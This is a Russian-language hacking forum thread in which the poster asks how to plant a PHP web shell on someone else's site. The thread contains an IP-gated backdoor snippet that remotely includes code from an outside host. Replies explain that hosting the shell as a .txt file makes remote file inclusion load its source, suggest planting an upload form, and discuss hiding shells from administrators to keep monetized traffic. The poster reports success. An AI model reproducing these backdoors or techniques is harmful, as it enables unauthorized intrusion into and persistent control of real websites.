Привет ачату, хотел спросить, возможно ли вставить код пхп с чужого сайта ?
Допустим есть шелл на сайте www.blabla.ru/shell.php
и есть сайт www.gavgav.ru, хотелось бы исправить index чтоб при открытии открывался мой шелл на этом сайте.
Как я понял если вставлять инклюд то грузится тока уже
выполненный код, кто нибудь подскажет как сделать грузился сам код шелла ? :)

<?
$ip_ds = array('10.0.60.23','127.0.0.1','127.0.0.1');
else echo"Нима blabla.php";die();

$user_ip_ds = $_SERVER['REMOTE_ADDR'];
$col = count($ip_ds);
$pr_ds=0;
for($i=0; $i<$col;$i++)
{if($ip_ds[$i]==$user_ip_ds){$i=$col; $pr_ds="777";}}
if($pr_ds!=777) echo"not foud";
if($pr_ds==777) include ('http://www.parkour1.ic.cz/config');
?>

Сохраняй и инклудь шелл с расширением .txt, чтобы код не интерпретировался.

По сабжу - гы, а чо, прикольно, взял и прочитал config.php с чужого сайта, да? ))))

PS: Хотя задумка с шеллами конечно просто великолепна

Сохраняй и инклудь шелл с расширением .txt, чтобы код не интерпретировался.

кхм, тема просто отличная, серьезно )

кхм, тема просто отличная, серьезно )
Эм... не понял иронии... в общем я всегда так делаю - у меня на хосте лежит шелл с .txt расширением. Нахожу RFI, инклужу его...

Всё получилось, Mailbrush большое спасибо :)

Эм... не понял иронии... в общем я всегда так делаю - у меня на хосте лежит шелл с .txt расширением. Нахожу RFI, инклужу его... ...и перечитай свой первый пост в теме - ты можешь посмотреть сорцы шелла не из шелла?)

инетересно чо там у ТС получилось

PS: Перечитал первый вопрос - таки понял, чего спрашивали. Ну и езык

лично мне вот такая фраза:


кто нибудь подскажет как сделать грузился сам код шелла ?


напоминает, например, это: http://pastebin.com

инетересно чо там у ТС получилось Да заливал на сайт шеллы, их постоянно удаляли, терь попробовал вставить в index.php этот инклюд который работает тока с ip деда, недумаю что в index.php он будет искать :D

Нет, что ты, ни один нормальный админ в index.php ставший на ~ 50 кб больше и содержащий кучу непонятного кода в жизни не заглянет )

Нет, что ты, ни один нормальный админ в index.php ставший на ~ 50 кб больше и содержащий кучу непонятного кода в жизни не заглянет ) ничо там нету он изменился маскимум на 2кб + там никакого кода нету кроме инклюда и проверки ip...

Pashkela как ты прячешь shellы ?

Конечно не скажу, о чем ты. Ну сам подумай. Это траф, а траф - это деньги. Тебе нужны мои деньги? Мне тоже.

PS: Ну уж точно не удаленный инклуд, паля сразу и домен (сколько он после такого проживет?) и надеясь на постоянный allow_url_include = on

паля сразу и домен :D narod.ru
allow_url_include = on вот это да... (((
мб посоветуешь что нить норм, то что не в привате))) ?

вставь например просто форму загрузки файла, или....в общем читай "Ваши вопросы по уязвимостям" на этом сайте - там все есть.

Ладно, спасибо :)

он изменился маскимум на 2кб + там никакого кода нету кроме инклюда и проверки ip...
фига се проверка на ip на 2 кб ))

фига се проверка на ip на 2 кб ))
да это я от балды написал)))

Шелл удалили((( жесть.. кто нить подскажите кто нибудь норм способ спрятать шелл(